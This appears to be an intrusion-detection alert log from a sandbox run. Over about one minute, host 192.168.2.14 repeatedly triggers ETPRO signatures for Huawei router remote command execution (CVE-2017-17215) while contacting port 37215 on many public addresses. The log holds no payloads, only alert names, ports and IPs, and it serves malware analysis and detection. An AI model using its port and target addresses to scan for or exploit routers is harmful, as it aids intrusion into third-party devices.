                                            06/14/24-10:44:24.915635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456637215192.168.2.14156.68.100.96
                                            06/14/24-10:43:41.845845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406837215192.168.2.1441.204.119.255
                                            06/14/24-10:44:16.716913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287037215192.168.2.14156.207.84.153
                                            06/14/24-10:44:14.672683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667437215192.168.2.14156.166.129.143
                                            06/14/24-10:44:08.501668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745237215192.168.2.14156.78.119.149
                                            06/14/24-10:44:29.028073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547637215192.168.2.1441.44.245.46
                                            06/14/24-10:44:24.934385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448037215192.168.2.14197.250.83.177
                                            06/14/24-10:43:37.759726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559237215192.168.2.1441.71.211.23
                                            06/14/24-10:44:24.916427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892437215192.168.2.1441.6.36.19
                                            06/14/24-10:44:06.471305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4179437215192.168.2.1441.147.97.19
                                            06/14/24-10:44:10.564764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934037215192.168.2.1441.138.108.243
                                            06/14/24-10:43:58.292709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650837215192.168.2.1441.69.188.246
                                            06/14/24-10:43:34.660975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4020037215192.168.2.14197.92.82.210
                                            06/14/24-10:44:04.411448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491037215192.168.2.14156.73.126.132
                                            06/14/24-10:43:36.717947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681837215192.168.2.1441.36.144.189
                                            06/14/24-10:44:12.616089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978637215192.168.2.14197.184.3.62
                                            06/14/24-10:43:39.791164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443237215192.168.2.14156.189.31.235
                                            06/14/24-10:43:41.848840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794637215192.168.2.14156.187.105.241
                                            06/14/24-10:44:16.717884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978437215192.168.2.1441.3.216.245
                                            06/14/24-10:44:06.469711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084437215192.168.2.14197.163.176.166
                                            06/14/24-10:43:34.663211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421237215192.168.2.14156.219.247.62
                                            06/14/24-10:44:04.421226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576437215192.168.2.14156.99.25.100
                                            06/14/24-10:43:58.276569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013837215192.168.2.1441.121.104.199
                                            06/14/24-10:44:10.568407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026237215192.168.2.14156.173.96.7
                                            06/14/24-10:44:20.807331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720837215192.168.2.14156.115.36.251
                                            06/14/24-10:44:31.054947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017837215192.168.2.14197.70.146.145
                                            06/14/24-10:43:58.274229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886437215192.168.2.14197.249.28.65
                                            06/14/24-10:44:20.828344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922037215192.168.2.1441.132.229.125
                                            06/14/24-10:43:50.111623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790037215192.168.2.14197.25.242.173
                                            06/14/24-10:44:14.682653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570237215192.168.2.14197.89.71.178
                                            06/14/24-10:44:24.947242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115237215192.168.2.1441.245.25.198
                                            06/14/24-10:43:48.032689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603237215192.168.2.14156.86.151.194
                                            06/14/24-10:44:08.503601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246637215192.168.2.14197.200.124.140
                                            06/14/24-10:44:20.830946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201837215192.168.2.14156.105.143.62
                                            06/14/24-10:43:50.069691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685437215192.168.2.1441.244.165.32
                                            06/14/24-10:44:16.716065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475437215192.168.2.14197.208.83.55
                                            06/14/24-10:44:02.368830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012037215192.168.2.14156.40.148.244
                                            06/14/24-10:44:16.719002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985237215192.168.2.14156.80.186.31
                                            06/14/24-10:44:20.829579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326237215192.168.2.14156.138.77.57
                                            06/14/24-10:43:39.812260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430437215192.168.2.1441.53.143.0
                                            06/14/24-10:44:31.051318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932637215192.168.2.14197.140.151.8
                                            06/14/24-10:44:10.545502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789237215192.168.2.1441.95.252.86
                                            06/14/24-10:44:24.916319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053237215192.168.2.14197.51.24.23
                                            06/14/24-10:44:20.827500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862237215192.168.2.14156.241.199.73
                                            06/14/24-10:43:36.727567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940237215192.168.2.14197.244.153.193
                                            06/14/24-10:43:39.812797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593437215192.168.2.14156.229.95.39
                                            06/14/24-10:44:26.980776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4500437215192.168.2.1441.122.17.250
                                            06/14/24-10:44:24.932538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800237215192.168.2.1441.255.138.187
                                            06/14/24-10:43:39.789508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336237215192.168.2.14197.42.25.51
                                            06/14/24-10:44:14.671748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318437215192.168.2.14197.167.46.22
                                            06/14/24-10:44:33.148904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752837215192.168.2.14197.84.139.250
                                            06/14/24-10:44:18.776875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412837215192.168.2.14156.54.34.48
                                            06/14/24-10:44:35.180201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819237215192.168.2.14197.201.147.115
                                            06/14/24-10:43:45.984505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468637215192.168.2.1441.238.133.200
                                            06/14/24-10:44:31.089885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546637215192.168.2.1441.175.137.76
                                            06/14/24-10:43:54.185067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714037215192.168.2.1441.48.141.188
                                            06/14/24-10:44:20.807678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905437215192.168.2.1441.223.240.199
                                            06/14/24-10:43:39.790535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206037215192.168.2.14156.5.246.226
                                            06/14/24-10:44:08.502566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634037215192.168.2.14197.45.81.126
                                            06/14/24-10:44:29.023096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003237215192.168.2.1441.112.21.200
                                            06/14/24-10:43:37.761593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809437215192.168.2.14156.53.210.229
                                            06/14/24-10:43:43.967847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428837215192.168.2.14156.143.145.2
                                            06/14/24-10:44:29.022140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809237215192.168.2.14197.67.51.57
                                            06/14/24-10:44:04.421079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021437215192.168.2.14156.159.180.35
                                            06/14/24-10:44:00.322126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746037215192.168.2.1441.188.76.79
                                            06/14/24-10:44:14.666865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523037215192.168.2.14156.0.99.1
                                            06/14/24-10:44:14.682714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030837215192.168.2.14197.219.136.245
                                            06/14/24-10:44:18.779570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733237215192.168.2.14197.206.242.66
                                            06/14/24-10:44:06.472883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971637215192.168.2.14197.231.17.177
                                            06/14/24-10:44:12.647198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740837215192.168.2.14197.190.19.133
                                            06/14/24-10:44:02.366931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480437215192.168.2.14197.104.30.118
                                            06/14/24-10:44:29.023746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555837215192.168.2.1441.163.229.118
                                            06/14/24-10:44:24.913439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5873837215192.168.2.14197.80.61.14
                                            06/14/24-10:44:26.986510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313837215192.168.2.14197.222.9.70
                                            06/14/24-10:43:34.663249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5823437215192.168.2.1441.129.130.21
                                            06/14/24-10:43:56.227154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.14156.229.187.84
                                            06/14/24-10:44:16.737453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036437215192.168.2.1441.26.224.18
                                            06/14/24-10:43:36.701389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623237215192.168.2.14156.59.211.171
                                            06/14/24-10:43:36.704232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790837215192.168.2.1441.180.194.12
                                            06/14/24-10:43:41.846197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739037215192.168.2.1441.30.5.248
                                            06/14/24-10:43:52.149437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523837215192.168.2.14156.79.130.87
                                            06/14/24-10:44:04.425132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199237215192.168.2.14197.8.69.209
                                            06/14/24-10:44:16.732268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668237215192.168.2.14156.224.136.199
                                            06/14/24-10:44:10.569271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652437215192.168.2.14197.136.34.89
                                            06/14/24-10:43:52.165061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515237215192.168.2.14156.178.94.203
                                            06/14/24-10:44:00.338556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867237215192.168.2.14156.28.171.212
                                            06/14/24-10:43:43.940477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538637215192.168.2.14197.128.152.155
                                            06/14/24-10:44:08.503222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089837215192.168.2.14156.47.223.225
                                            06/14/24-10:44:14.671967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.14156.178.59.54
                                            06/14/24-10:44:16.737544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383637215192.168.2.14197.47.130.245
                                            06/14/24-10:44:06.451340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030437215192.168.2.14156.103.162.225
                                            06/14/24-10:44:24.917943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391037215192.168.2.14197.94.236.117
                                            06/14/24-10:43:36.702225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512837215192.168.2.1441.45.205.77
                                            06/14/24-10:43:39.788987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290437215192.168.2.14156.103.173.68
                                            06/14/24-10:44:20.830010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350637215192.168.2.14156.130.89.157
                                            06/14/24-10:44:35.179038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999637215192.168.2.14156.96.138.253
                                            06/14/24-10:44:22.859267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632437215192.168.2.14156.92.72.101
                                            06/14/24-10:44:12.624739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224237215192.168.2.1441.67.11.228
                                            06/14/24-10:44:31.053136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283437215192.168.2.1441.48.245.0
                                            06/14/24-10:44:02.369186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326237215192.168.2.14156.5.190.254
                                            06/14/24-10:44:24.916765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.14156.47.141.19
                                            06/14/24-10:44:12.617779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608637215192.168.2.1441.100.161.178
                                            06/14/24-10:44:16.716930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004237215192.168.2.14197.141.146.162
                                            06/14/24-10:43:43.940803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099037215192.168.2.1441.95.185.53
                                            06/14/24-10:43:34.662590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357237215192.168.2.14156.251.163.18
                                            06/14/24-10:44:00.325137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097837215192.168.2.14197.29.245.62
                                            06/14/24-10:44:29.014485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999837215192.168.2.14156.115.204.6
                                            06/14/24-10:43:43.944136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441637215192.168.2.14197.132.35.60
                                            06/14/24-10:44:00.323036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128237215192.168.2.14197.210.194.29
                                            06/14/24-10:44:16.718024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246237215192.168.2.1441.73.13.147
                                            06/14/24-10:44:06.450928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801437215192.168.2.1441.146.14.72
                                            06/14/24-10:44:16.735628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5645437215192.168.2.14156.173.15.250
                                            06/14/24-10:44:14.686582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081637215192.168.2.14197.235.102.122
                                            06/14/24-10:44:22.857938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077837215192.168.2.14156.167.3.67
                                            06/14/24-10:44:29.012033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606437215192.168.2.14197.247.203.84
                                            06/14/24-10:44:20.830809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016837215192.168.2.14197.146.4.5
                                            06/14/24-10:43:48.034729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529037215192.168.2.1441.223.65.218
                                            06/14/24-10:43:52.163226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814637215192.168.2.14156.137.173.211
                                            06/14/24-10:44:10.564573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031037215192.168.2.14156.42.126.78
                                            06/14/24-10:44:20.828371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349837215192.168.2.14156.106.1.189
                                            06/14/24-10:43:41.897278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422437215192.168.2.1441.240.145.233
                                            06/14/24-10:43:37.759656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961837215192.168.2.14156.94.35.254
                                            06/14/24-10:44:24.943300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498637215192.168.2.1441.174.12.120
                                            06/14/24-10:43:43.971924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428437215192.168.2.1441.117.176.147
                                            06/14/24-10:43:45.989965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339637215192.168.2.1441.171.206.186
                                            06/14/24-10:44:12.645929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027637215192.168.2.14156.235.115.171
                                            06/14/24-10:43:43.968826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443437215192.168.2.14197.201.100.203
                                            06/14/24-10:44:12.640556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259637215192.168.2.1441.103.92.63
                                            06/14/24-10:44:14.683152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929837215192.168.2.14156.13.210.240
                                            06/14/24-10:44:04.421725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073037215192.168.2.1441.181.65.31
                                            06/14/24-10:43:48.033695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683237215192.168.2.14156.181.194.146
                                            06/14/24-10:44:00.325313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734237215192.168.2.14197.126.236.196
                                            06/14/24-10:44:10.548932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026837215192.168.2.14197.178.184.90
                                            06/14/24-10:43:50.072994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722637215192.168.2.14197.217.211.188
                                            06/14/24-10:44:06.470061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468237215192.168.2.14156.231.233.31
                                            06/14/24-10:43:34.660750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801437215192.168.2.14197.30.81.14
                                            06/14/24-10:43:36.724549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510437215192.168.2.14197.25.195.106
                                            06/14/24-10:43:34.663310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3916437215192.168.2.1441.180.54.14
                                            06/14/24-10:44:31.083657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4460437215192.168.2.1441.85.244.250
                                            06/14/24-10:44:10.567036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959037215192.168.2.14197.42.159.59
                                            06/14/24-10:43:58.291228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355637215192.168.2.14197.24.143.107
                                            06/14/24-10:44:14.683594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862037215192.168.2.14156.13.205.191
                                            06/14/24-10:44:16.716368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492637215192.168.2.14156.129.185.99
                                            06/14/24-10:44:20.827419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057637215192.168.2.14197.254.174.85
                                            06/14/24-10:43:50.072286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483037215192.168.2.14197.198.187.169
                                            06/14/24-10:44:24.934447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541437215192.168.2.1441.167.43.168
                                            06/14/24-10:44:31.051065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680037215192.168.2.1441.159.0.83
                                            06/14/24-10:44:10.565038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717437215192.168.2.14156.225.38.46
                                            06/14/24-10:44:08.505163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842637215192.168.2.1441.200.10.214
                                            06/14/24-10:43:41.905018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743437215192.168.2.1441.97.77.117
                                            06/14/24-10:43:48.046063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507437215192.168.2.1441.251.220.57
                                            06/14/24-10:43:43.944267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014437215192.168.2.1441.179.216.10
                                            06/14/24-10:43:48.034892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716637215192.168.2.14197.130.226.9
                                            06/14/24-10:43:34.662346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120837215192.168.2.14197.244.221.110
                                            06/14/24-10:43:56.246330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560637215192.168.2.14156.105.1.221
                                            06/14/24-10:43:43.942580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080637215192.168.2.1441.26.46.56
                                            06/14/24-10:44:06.473697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5549637215192.168.2.14156.61.171.13
                                            06/14/24-10:44:18.765936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789837215192.168.2.14156.223.132.248
                                            06/14/24-10:44:08.502269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830637215192.168.2.1441.188.100.58
                                            06/14/24-10:43:56.245569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865037215192.168.2.14156.130.243.214
                                            06/14/24-10:43:52.148054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215837215192.168.2.1441.237.29.65
                                            06/14/24-10:43:52.164536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466837215192.168.2.1441.161.3.243
                                            06/14/24-10:44:06.449869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363837215192.168.2.14156.172.200.191
                                            06/14/24-10:44:10.545944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483237215192.168.2.1441.111.175.214
                                            06/14/24-10:44:33.148785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221037215192.168.2.1441.245.183.126
                                            06/14/24-10:43:50.115251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005437215192.168.2.14197.14.173.230
                                            06/14/24-10:43:34.663794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042237215192.168.2.1441.122.39.98
                                            06/14/24-10:43:39.812099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296837215192.168.2.1441.210.22.93
                                            06/14/24-10:43:45.966600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531837215192.168.2.1441.77.103.144
                                            06/14/24-10:44:31.094449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471637215192.168.2.1441.96.56.110
                                            06/14/24-10:44:06.469865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587437215192.168.2.14156.188.24.35
                                            06/14/24-10:44:14.672329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932637215192.168.2.1441.100.77.85
                                            06/14/24-10:44:33.152866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289637215192.168.2.1441.54.150.206
                                            06/14/24-10:43:45.969688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4107237215192.168.2.14197.207.29.22
                                            06/14/24-10:44:31.056378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644437215192.168.2.14197.50.133.30
                                            06/14/24-10:43:45.965682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854437215192.168.2.14156.249.167.129
                                            06/14/24-10:44:14.681807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155237215192.168.2.1441.204.89.195
                                            06/14/24-10:43:56.228728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223437215192.168.2.14156.0.147.70
                                            06/14/24-10:44:31.052803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797637215192.168.2.1441.246.50.77
                                            06/14/24-10:43:45.987448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410837215192.168.2.1441.33.123.135
                                            06/14/24-10:43:50.073548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362437215192.168.2.14156.49.0.239
                                            06/14/24-10:44:16.718368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837837215192.168.2.1441.129.182.64
                                            06/14/24-10:44:12.625562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557237215192.168.2.14156.233.172.79
                                            06/14/24-10:44:20.830520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957437215192.168.2.14156.187.114.42
                                            06/14/24-10:44:31.088807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998237215192.168.2.14156.41.13.69
                                            06/14/24-10:43:48.033716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498437215192.168.2.14156.98.140.158
                                            06/14/24-10:44:29.025791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801837215192.168.2.14197.10.234.221
                                            06/14/24-10:43:50.074277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070437215192.168.2.14197.124.177.92
